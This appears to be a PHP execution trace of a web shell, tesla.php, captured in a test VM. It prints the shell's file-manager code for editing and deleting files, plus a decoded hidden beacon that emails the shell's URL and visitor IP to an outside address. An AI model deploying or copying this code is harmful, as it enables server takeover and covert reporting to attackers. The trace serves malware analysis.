\'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<br><br><font color="lime">EDIT FILE SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Edit File Gagal !!")</script>\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src" style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1000px;">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Lanjut" style="height:30px; width:70px;"/>\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br /><center>\';\r\n\r\n//delete dir\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<br><br><font color="lime">DELETE DIR SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Delete Dir Gagal !!")</script>>\';\r\n}\r\n}\r\n\r\n//delete file\r\nelseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'<br><br><font color="lime">DELETE FILE SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Delete File Gagal !!")</script>\';\r\n}\r\n}\r\n}\r\n\r\n?>\r\n<?php\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\n$pa = getcwd();\r\necho \'<div id="content"><table width="95%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">\r\n<tr class="first">\r\n<th><center>Name</center></th>\r\n<th><center>Size</center></th>\r\n<th><center>Perm</center></th>\r\n<th><center>Options</center></th>\r\n</tr>\r\n<tr>\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "<tr>\r\n<td class=td_home><img src=\'data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=\'><a href=\\"?path=$path/$dir\\"> $dir</a></td>\r\n<td class=td_home><center>DIR</center></td>\r\n<td class=td_home><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="#57FF00">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="#FF0004">\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\n\r\necho "</center></td>\r\n<td class=td_home><center><form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n<select name=\\"opt\\" style=\\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\\">\r\n<option value=\\"Action\\">Action</option>\r\n<option value=\\"delete\\">Delete</option>\r\n<option value=\\"chmod\\">Chmod</option>\r\n<option value=\\"rename\\">Rename</option>\r\n</select>\r\n<input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\">\r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\">\r\n<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\">\r\n<input type=\\"submit\\" value=\\">\\" style=\\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\\"/>\r\n</form></center></td>\r\n</tr>";\r\n}\r\n\r\necho \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\';\r\nforeach($scandir as $file){\r\nif(!is_file("$path/$file")) continue;\r\n$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho "<tr>\r\n<td class=td_home><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=\'><a href=\\"?filesrc=$path/$file&path=$path\\"> $file</a></td>\r\n<td class=td_home><center>".$size."</center></td>\r\n<td class=td_home><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="#57FF00">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="#FF0004">\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\n\r\necho "</center></td>\r\n<td class=td_home><center><form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n<select name=\\"opt\\" style=\\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\\">\r\n<option value=\\"Action\\">Action</option>\r\n<option value=\\"delete\\">Delete</option>\r\n<option value=\\"edit\\">Edit</option>\r\n<option value=\\"rename\\">Rename</option>\r\n<option value=\\"chmod\\">Chmod</option>\r\n</select>\r\n<input type=\\"hidden\\" name=\\"type\\" value=\\"file\\">\r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\">\r\n<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\">\r\n<input type=\\"submit\\" value=\\">\\" style=\\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\\"/>\r\n</form></center></td>\r\n</tr>";\r\n}\r\n\r\necho \'</table>\r\n</div>\';\r\n}\r\n\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}' /var/www/html/uploads/tesla.php 2 0
3 9 0 0.001628 479400 error_reporting 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 1 1 0
3 9 1 0.001649 479440
3 9 R 22527
3 10 0 0.001663 479400 session_start 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 2 0
3 10 1 0.001728 480152
3 10 R TRUE
3 11 0 0.001745 480152 get_magic_quotes_gpc 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 4 0
3 11 1 0.001758 480152
3 11 R FALSE
3 12 0 0.001773 480376 gethostbyname 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 76 1 'localhost'
3 12 1 0.001820 480456
3 12 R '127.0.0.1'
3 13 0 0.001838 480472 php_uname 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 77 0
3 13 1 0.001852 480584
3 13 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3 14 0 0.001872 480152 getcwd 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 85 0
3 14 1 0.001886 480200
3 14 R '/var/www/html/uploads'
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 85 $path = '/var/www/html/uploads'
3 15 0 0.001914 480200 str_replace 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 87 3 '\\' '/' '/var/www/html/uploads'
3 15 1 0.001930 480296
3 15 R '/var/www/html/uploads'
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 87 $path = '/var/www/html/uploads'
3 16 0 0.001955 480200 explode 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 88 2 '/' '/var/www/html/uploads'
3 16 1 0.001970 480776
3 16 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 88 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 90 $id = 0
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 92 $a = TRUE
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 90 $id = 1
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i = 0
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 90 $id = 2
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i = 0
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 90 $id = 3
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i = 0
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 90 $id = 4
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i = 0
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 98 $i++
3 17 0 0.002214 480704 scandir 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 218 1 '/var/www/html/uploads'
3 17 1 0.002248 481328
3 17 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'tesla.php']
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 218 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'tesla.php']
3 18 0 0.002286 481296 getcwd 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 219 0
3 18 1 0.002300 481344
3 18 R '/var/www/html/uploads'
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 219 $pa = '/var/www/html/uploads'
3 19 0 0.002326 481392 is_dir 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 230 1 '/var/www/html/uploads/.'
3 19 1 0.002343 481456
3 19 R TRUE
3 20 0 0.002357 481424 is_dir 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 230 1 '/var/www/html/uploads/..'
3 20 1 0.002376 481472
3 20 R TRUE
3 21 0 0.002390 481432 is_dir 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 230 1 '/var/www/html/uploads/.htaccess'
3 21 1 0.002405 481472
3 21 R FALSE
3 22 0 0.002419 481432 is_dir 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 230 1 '/var/www/html/uploads/data'
3 22 1 0.002433 481472
3 22 R TRUE
3 23 0 0.002447 481432 is_writable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 235 1 '/var/www/html/uploads/data'
3 23 1 0.002465 481472
3 23 R TRUE
3 24 0 0.002488 481432 perms 1 /var/www/html/uploads/tesla.php(2) : eval()'d code 237 1 '/var/www/html/uploads/data'
4 25 0 0.002502 481432 fileperms 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 298 1 '/var/www/html/uploads/data'
4 25 1 0.002516 481472
4 25 R 16895
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 298 $perms = 16895
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 314 $info = 'd'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 327 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 328 $info .= 'w'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 331 $info .= 'x'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 334 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 335 $info .= 'w'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 338 $info .= 'x'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 341 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 342 $info .= 'w'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 345 $info .= 'x'
3 24 1 0.002642 481472
3 24 R 'drwxrwxrwx'
3 26 0 0.002656 481432 is_writable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 238 1 '/var/www/html/uploads/data'
3 26 1 0.002673 481472
3 26 R TRUE
3 27 0 0.002687 481440 is_dir 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 230 1 '/var/www/html/uploads/prepend.php'
3 27 1 0.002703 481488
3 27 R FALSE
3 28 0 0.002716 481440 is_dir 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 230 1 '/var/www/html/uploads/tesla.php'
3 28 1 0.002731 481472
3 28 R FALSE
3 29 0 0.002749 481536 is_file 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 258 1 '/var/www/html/uploads/.'
3 29 1 0.002765 481568
3 29 R FALSE
3 30 0 0.002778 481536 is_file 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 258 1 '/var/www/html/uploads/..'
3 30 1 0.002793 481584
3 30 R FALSE
3 31 0 0.002806 481544 is_file 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 258 1 '/var/www/html/uploads/.htaccess'
3 31 1 0.002820 481584
3 31 R TRUE
3 32 0 0.002833 481544 filesize 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 259 1 '/var/www/html/uploads/.htaccess'
3 32 1 0.002846 481584
3 32 R 64
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 259 $size = 0.0625
3 33 0 0.002871 481488 round 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 260 2 0.0625 3
3 33 1 0.002885 481560
3 33 R 0.063
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 260 $size = 0.063
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 264 $size = '0.063 KB'
3 34 0 0.002921 481584 is_writable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 271 1 '/var/www/html/uploads/.htaccess'
3 34 1 0.002938 481624
3 34 R FALSE
3 35 0 0.002951 481584 is_readable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 272 1 '/var/www/html/uploads/.htaccess'
3 35 1 0.002966 481624
3 35 R TRUE
3 36 0 0.002979 481584 perms 1 /var/www/html/uploads/tesla.php(2) : eval()'d code 273 1 '/var/www/html/uploads/.htaccess'
4 37 0 0.002992 481584 fileperms 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 298 1 '/var/www/html/uploads/.htaccess'
4 37 1 0.003006 481624
4 37 R 33188
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 298 $perms = 33188
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 308 $info = '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 327 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 328 $info .= 'w'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 331 $info .= '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 334 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 335 $info .= '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 338 $info .= '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 341 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 342 $info .= '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 345 $info .= '-'
3 36 1 0.003133 481624
3 36 R '-rw-r--r--'
3 38 0 0.003147 481584 is_writable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 274 1 '/var/www/html/uploads/.htaccess'
3 38 1 0.003163 481624
3 38 R FALSE
3 39 0 0.003176 481584 is_readable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 274 1 '/var/www/html/uploads/.htaccess'
3 39 1 0.003191 481624
3 39 R TRUE
3 40 0 0.003204 481584 is_file 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 258 1 '/var/www/html/uploads/data'
3 40 1 0.003219 481624
3 40 R FALSE
3 41 0 0.003232 481592 is_file 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 258 1 '/var/www/html/uploads/prepend.php'
3 41 1 0.003248 481640
3 41 R TRUE
3 42 0 0.003260 481600 filesize 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 259 1 '/var/www/html/uploads/prepend.php'
3 42 1 0.003274 481640
3 42 R 57
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 259 $size = 0.0556640625
3 43 0 0.003298 481496 round 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 260 2 0.0556640625 3
3 43 1 0.003312 481568
3 43 R 0.056
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 260 $size = 0.056
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 264 $size = '0.056 KB'
3 44 0 0.003348 481600 is_writable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 271 1 '/var/www/html/uploads/prepend.php'
3 44 1 0.003364 481640
3 44 R FALSE
3 45 0 0.003377 481600 is_readable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 272 1 '/var/www/html/uploads/prepend.php'
3 45 1 0.003392 481640
3 45 R TRUE
3 46 0 0.003405 481600 perms 1 /var/www/html/uploads/tesla.php(2) : eval()'d code 273 1 '/var/www/html/uploads/prepend.php'
4 47 0 0.003419 481600 fileperms 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 298 1 '/var/www/html/uploads/prepend.php'
4 47 1 0.003433 481640
4 47 R 33261
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 298 $perms = 33261
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 308 $info = '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 327 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 328 $info .= 'w'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 331 $info .= 'x'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 334 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 335 $info .= '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 338 $info .= 'x'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 341 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 342 $info .= '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 345 $info .= 'x'
3 46 1 0.003556 481640
3 46 R '-rwxr-xr-x'
3 48 0 0.003570 481600 is_writable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 274 1 '/var/www/html/uploads/prepend.php'
3 48 1 0.003586 481640
3 48 R FALSE
3 49 0 0.003600 481600 is_readable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 274 1 '/var/www/html/uploads/prepend.php'
3 49 1 0.003615 481640
3 49 R TRUE
3 50 0 0.003766 481592 is_file 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 258 1 '/var/www/html/uploads/tesla.php'
3 50 1 0.003784 481624
3 50 R TRUE
3 51 0 0.003798 481584 filesize 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 259 1 '/var/www/html/uploads/tesla.php'
3 51 1 0.003812 481624
3 51 R 6114
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 259 $size = 5.970703125
3 52 0 0.003836 481488 round 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 260 2 5.970703125 3
3 52 1 0.003850 481560
3 52 R 5.971
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 260 $size = 5.971
2 A /var/www/html/uploads/tesla.php(2) : eval()'d code 264 $size = '5.971 KB'
3 53 0 0.003891 481584 is_writable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 271 1 '/var/www/html/uploads/tesla.php'
3 53 1 0.003908 481624
3 53 R FALSE
3 54 0 0.003921 481584 is_readable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 272 1 '/var/www/html/uploads/tesla.php'
3 54 1 0.003936 481624
3 54 R TRUE
3 55 0 0.003949 481584 perms 1 /var/www/html/uploads/tesla.php(2) : eval()'d code 273 1 '/var/www/html/uploads/tesla.php'
4 56 0 0.003962 481584 fileperms 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 298 1 '/var/www/html/uploads/tesla.php'
4 56 1 0.003975 481624
4 56 R 33204
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 298 $perms = 33204
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 308 $info = '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 327 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 328 $info .= 'w'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 331 $info .= '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 334 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 335 $info .= 'w'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 338 $info .= '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 341 $info .= 'r'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 342 $info .= '-'
3 A /var/www/html/uploads/tesla.php(2) : eval()'d code 345 $info .= '-'
3 55 1 0.004100 481624
3 55 R '-rw-rw-r--'
3 57 0 0.004114 481584 is_writable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 274 1 '/var/www/html/uploads/tesla.php'
3 57 1 0.004129 481624
3 57 R FALSE
3 58 0 0.004142 481584 is_readable 0 /var/www/html/uploads/tesla.php(2) : eval()'d code 274 1 '/var/www/html/uploads/tesla.php'
3 58 1 0.004158 481624
3 58 R TRUE
2 8 1 0.004172 481528
2 59 0 0.004184 435296 base64_decode 0 /var/www/html/uploads/tesla.php 5 1 'jY9deMIwFIb/yiEIqcOPXYwxTQTnSethcXMirCIhDckpKJlaWlP765fOIWZKuwq8z3ueZjL1wmZ6MaJSibJR/kTWtUhenOgAYfsJWS+FynjZmAO3VxVX/+BAOPrW8sa3HqMuugy0ti3U4VlPnd7f5TRjdFpySFFfC4FJ4DA7VRsD2j2OHbZaAlR0RxBZFtnb8KGb6G75TBrRGt/ABHV6sBDGCaO9ZNNGF4+OUlhQZM+lThdXxCHKazwmMIIen7P0haVbbX754zJ0Z2pSRfa8YPOML9IN3QWRtNoIYRqrsLPVfn+RxxJhNkKwrCpytYYYtkD+uPJMxvhltVe/txDYkQS6M6NfPxkAbJ+t1ywlg6toIf+PsJ98AQ=='
2 59 1 0.004208 435776
2 59 R '��]x�0\024���!\b�Ï]�1M\004�I�aqs"�"!\r�)(�ZZS���!fJ�\n��{�f2��fz1�R��Q�DֵH^��\000a�\tY/��x٘\003�W\025W��@8���Ʒ\036�.�\f��-��YO����4ctZrHQ_\v�I�0;U\033\003�=�\035�Z\002TtG\020Y\026����n�L\032�\032�\004uz�\020�\t��d�F\027��RXPdϥN\027W�!�k<&0�\036���[m~��2tgjRE��`�/�\r�\005���\ba\032����~��\022a6B��*r��\030�@���L�e�W��\020ؑ\004�3�_?\031\000l���,%��h!����|\001'
2 60 0 0.004253 435744 str_rot13 0 /var/www/html/uploads/tesla.php 5 1 '��]x�0\024���!\b�Ï]�1M\004�I�aqs"�"!\r�)(�ZZS���!fJ�\n��{�f2��fz1�R��Q�DֵH^��\000a�\tY/��x٘\003�W\025W��@8���Ʒ\036�.�\f��-��YO����4ctZrHQ_\v�I�0;U\033\003�=�\035�Z\002TtG\020Y\026����n�L\032�\032�\004uz�\020�\t��d�F\027��RXPdϥN\027W�!�k<&0�\036���[m~��2tgjRE��`�/�\r�\005���\ba\032����~��\022a6B��*r��\030�@���L�e�W��\020ؑ\004�3�_?\031\000l���,%��h!����|\001'
2 60 1 0.004294 436096
2 60 R '��]k�0\024���!\b�Ï]�1Z\004�V�ndf"�"!\r�)(�MMF���!sW�\n��{�s2��sm1�E��D�QֵU^��\000n�\tL/��k٘\003�J\025J��@8���Ʒ\036�.�\f��-��LB����4pgMeUD_\v�V�0;H\033\003�=�\035�M\002GgT\020L\026����a�Y\032�\032�\004hm�\020�\t��q�S\027��EKCqϥA\027J�!�x<&0�\036���[z~��2gtwER��`�/�\r�\005���\bn\032����~��\022n6O��*e��\030�@���Y�r�J��\020ؑ\004�3�_?\031\000y���,%��u!����|\001'
2 61 0 0.004337 435616 gzinflate 0 /var/www/html/uploads/tesla.php 5 1 '��]k�0\024���!\b�Ï]�1Z\004�V�ndf"�"!\r�)(�MMF���!sW�\n��{�s2��sm1�E��D�QֵU^��\000n�\tL/��k٘\003�J\025J��@8���Ʒ\036�.�\f��-��LB����4pgMeUD_\v�V�0;H\033\003�=�\035�M\002GgT\020L\026����a�Y\032�\032�\004hm�\020�\t��q�S\027��EKCqϥA\027J�!�x<&0�\036���[z~��2gtwER��`�/�\r�\005���\bn\032����~��\022n6O��*e��\030�@���Y�r�J��\020ؑ\004�3�_?\031\000y���,%��u!����|\001'
2 61 1 0.004383 436160
2 61 R '@vav_frg(\'bhgchg_ohssrevat\', 0); @vav_frg(\'qvfcynl_reebef\', 0); frg_gvzr_yvzvg(0); vav_frg(\'zrzbel_yvzvg\', \'64Z\'); urnqre(\'Pbagrag-Glcr: grkg/ugzy; punefrg=HGS-8\'); $ghwhnaznvy = \'sngbanuanfvnu@tznvy.pbz\'; $k_cngu = "uggc://" . $_FREIRE[\'FREIRE_ANZR\'] . $_FREIRE[\'ERDHRFG_HEV\']; $crfna_nyreg = "svk $k_cngu :c *VC Nqqerff : [ " . $_FREIRE[\'ERZBGR_NQQE\'] . " ]"; znvy($ghwhnaznvy, "YBTTRE", $crfna_nyreg, "[ " . $_FREIRE[\'ERZBGR_NQQE\'] . " ]");'
